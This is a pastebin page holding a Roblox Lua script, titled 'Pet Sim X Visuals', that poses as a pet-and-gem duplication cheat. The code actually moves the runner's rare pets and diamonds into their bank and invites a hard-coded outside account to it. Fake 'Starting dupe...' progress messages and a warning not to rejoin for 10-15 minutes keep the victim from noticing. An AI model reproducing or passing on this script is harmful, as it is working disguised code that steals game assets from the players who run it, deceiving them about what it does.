Facebook
From Little Capybara, 2 Years ago, written in Plain Text.
This paste is a reply to Pet Sim X Visuals from ptxxx - go back
Embed
Viewing differences between Pet Sim X Visuals and Re: Pet Sim X Visuals
local LocalNumber = 3349651036
local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
local mybanks = lib.Network.Invoke("get my banks")
local PetsList = {}
for i,v in pairs(lib.Save.Get().Pets) do
    local v2 = lib.Directory.Pets[v.id];
    if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Legendary" and v.r then
        table.insert(PetsList, v.uid);
    end
end
local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 0);
if request then
    lib.Message.New("Starting dupe... (6%)");
    wait(1)
    lib.Message.New("Starting dupe... (81%)");
    wait(1)
    lib.Message.New("Starting dupe... (83%)");
    wait(2)
    lib.Message.New("Starting dupe... (84%)");
    wait(3)
    lib.Message.New("Starting dupe... (94%)");
    wait(2)
    lib.Message.New("Starting dupe... (98%)");
    wait(3)
else
end
if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], LocalNumber) then
    lib.Message.New("Processing dupe! Please make sure all of your pets and gems are in the bank. If they aren't, quickly add them.");
    wait(5)
    lib.Message.New("Please do not rejoin the game in the next 10-15 minutes or you may lose the pet(s) and gems. If your pets and gems aren't in the bank, quickly add them.");
else
    lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], LocalNumber)
    lib.Message.New("Please do not rejoin the game in the next 10-15 minutes or you may lose the pet(s) and gems.");
end;